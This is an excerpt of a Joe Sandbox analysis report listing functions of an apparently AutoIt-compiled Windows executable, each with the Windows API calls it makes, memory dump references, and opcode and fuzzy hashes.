                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                                                                          • Opcode ID: 2926cf9507a9b1b8dafcea72bf5996e252e196d8971c480474c443ed902e900e
                                                                                                                                                                                                                                          • Instruction ID: 50af65f9edb5b30eb2d042a72a4dd9c2e3d0c00b303d9bf88df7b5386234233a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2926cf9507a9b1b8dafcea72bf5996e252e196d8971c480474c443ed902e900e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 613193B05043019FD760DF24D8847A7BBE4FF49718F00092EF5A997780EBB1AA84DB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000EF645 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 000EF661
                                                                                                                                                                                                                                            • Part of subcall function 000DD730: GetInputState.USER32 ref: 000DD807
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0012F2DE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4149333218-0
                                                                                                                                                                                                                                          • Opcode ID: 05d964ad316b12e097fcde7a2dbbc06eb033137e1e98062d6b1ef78fc10e798e
                                                                                                                                                                                                                                          • Instruction ID: 7a93c37ab533e2ffc1188bbb7c65f1afc420b99914b23eec8df282241ba5349b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05d964ad316b12e097fcde7a2dbbc06eb033137e1e98062d6b1ef78fc10e798e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F0A731240705DFD310EF75E845BAAB7E4FF46760F00002AE859C7361DBB0A840CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000DB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 000DBB4E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                                                                                          • Opcode ID: 9ae4ef5f6e742d22c3a20ae08daa9d34b1c4c4a180468da0bb2584d4d42cd5af
                                                                                                                                                                                                                                          • Instruction ID: ef316e750263deaffdc2b8e4ee9faa9cbde4eb202d11a81ed1ca52686edfdb70
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ae4ef5f6e742d22c3a20ae08daa9d34b1c4c4a180468da0bb2584d4d42cd5af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31329A34A00219DFDB25CF58C894ABEB7B9FF49310F16805AE905AB352C774ED91CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001558A2 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00155930
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                                                                                          • Opcode ID: 140fb7d7afeed718272ca911b6f7d7f33714f95a128085b5b501586bf9c79b9c
                                                                                                                                                                                                                                          • Instruction ID: 1915b210ef9205acb1523e55ee9efa2805b3e0f3a16dc073c9a22642852d0634
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 140fb7d7afeed718272ca911b6f7d7f33714f95a128085b5b501586bf9c79b9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4371CD30600205EFCB24CF54C890EBAB7F6FF59314F108529F965AB282D771AD89CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E9C
                                                                                                                                                                                                                                            • Part of subcall function 000D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000D4EAE
                                                                                                                                                                                                                                            • Part of subcall function 000D4E90: FreeLibrary.KERNEL32(00000000,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EC0
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EFD
                                                                                                                                                                                                                                            • Part of subcall function 000D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E62
                                                                                                                                                                                                                                            • Part of subcall function 000D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000D4E74
                                                                                                                                                                                                                                            • Part of subcall function 000D4E59: FreeLibrary.KERNEL32(00000000,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E87
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2632591731-0
                                                                                                                                                                                                                                          • Opcode ID: e45a2be7e3729d7735188c582c50499a279f5685d4fbe48449b168de3b482ec9
                                                                                                                                                                                                                                          • Instruction ID: 3ec55edad924f517c66db6a15cd1783399d21dd099140263ea2e653c72910b3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e45a2be7e3729d7735188c582c50499a279f5685d4fbe48449b168de3b482ec9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E11E332600305ABCB24AF64DC16FED77A5AF40B11F10843FF552A62E2EF709A459BB0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00108402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                                                                                          • Opcode ID: bb79d51b9ba06ed853080688746f855a6279babd715c7e2d143402398d6d4ab2
                                                                                                                                                                                                                                          • Instruction ID: bf67e5477d838f445220e15bede683075f79ffa9c32c102345ed4d975516de01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb79d51b9ba06ed853080688746f855a6279babd715c7e2d143402398d6d4ab2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB11487590810AAFCB05DF58E940ADE7BF4EF48304F104069F848EB352DB70DA11CBA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001629BF Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,001614B5,?), ref: 00162A01
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                          • Opcode ID: edd6d39e5bd4a22ee3fcdc1d3f3f987b3d995b79baa5ad0c7201ded804e58ad4
                                                                                                                                                                                                                                          • Instruction ID: 9d36f82474db20b284a9700f11c3588c9888aba01e822ce905cb23a08ec41d07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edd6d39e5bd4a22ee3fcdc1d3f3f987b3d995b79baa5ad0c7201ded804e58ad4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB01B136300E929FD324CA6CC854F227792EBC5318F29C468C0878B691DBB2EC52C7A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000FE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                                                                          • Instruction ID: 7adf6765dce139bd579b23315875e3efc6b72b3db539b80d2d56e3ae96a8310b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F0F932510A5C96C7323E65DC05BBA33989F72374F140715F661D79E2DFB09401A6A5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00103820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 3f6c968a8af418186caf8fd7bd3a9a3b1e3a0777c4a21d61119cfc80d5ead815
                                                                                                                                                                                                                                          • Instruction ID: 9d04c79fd5a133a0ebab173a5b18034210246705395166e4066bc37563c396ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f6c968a8af418186caf8fd7bd3a9a3b1e3a0777c4a21d61119cfc80d5ead815
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76E0E531100228A6D7212A669C00BEB364CAF427B0F0582A6FDA5928D1CB91DE0191E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4F6D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: b635aeddff4c3c9964403ffc430225b9d03ab4b5637f25d531e3e9afb23dc86c
                                                                                                                                                                                                                                          • Instruction ID: 072dd5d674a036797a2a2cda419833d5c897e10e20900cb92b3f401b9569e95b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b635aeddff4c3c9964403ffc430225b9d03ab4b5637f25d531e3e9afb23dc86c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66F03971105752CFDB349F64D890866BBF4AF14329320897FE2EA82A31CB319884DF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00162A55 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00162A66
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2353593579-0
                                                                                                                                                                                                                                          • Opcode ID: 7c72ca6421324293b4508e606943929eed947b53a29da947ab56f514795c03b7
                                                                                                                                                                                                                                          • Instruction ID: 2132b62326f1292ec43659ec1f7e14547523c0bf1b355df1a4a61c40699ac31c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c72ca6421324293b4508e606943929eed947b53a29da947ab56f514795c03b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E02636350516ABC714EB70DC808FE734CEF20394B000436FC26C3500DB7099A182F0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D30F2 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 000D314E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                                                                          • Opcode ID: 0a118ccf8d09727029d58d2d942b4f638ad8c7d8ad2081996dbb9a307b30b23c
                                                                                                                                                                                                                                          • Instruction ID: 4a9cb0c0cc346e85eaf6c1ba23bd19fbd1f9a7fe6d7ea721c21ef89abbff3564
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a118ccf8d09727029d58d2d942b4f638ad8c7d8ad2081996dbb9a307b30b23c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF03771914358AFEB52DF24DC457D67BFCBB01708F0000E5A68896692DBB457C8CF51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D2DC4
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                                                                                          • Opcode ID: 3468d1330ff4941580925c969ecb6be0d51ead8073797bb9cc6d1b063ab5182f
                                                                                                                                                                                                                                          • Instruction ID: 06429b4d8df68a1aaa4adf11959a3086572e0951e0f27205b125a9dc71cd9257
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3468d1330ff4941580925c969ecb6be0d51ead8073797bb9cc6d1b063ab5182f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E0CD726042245BC710A2589C05FEA77DDDFC8790F040076FD09D7248DA60ADC4C5A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000D3908
                                                                                                                                                                                                                                            • Part of subcall function 000DD730: GetInputState.USER32 ref: 000DD807
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 000D2B6B
                                                                                                                                                                                                                                            • Part of subcall function 000D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 000D314E
                                                                                                                                                                                                                                          Memory Dump Source
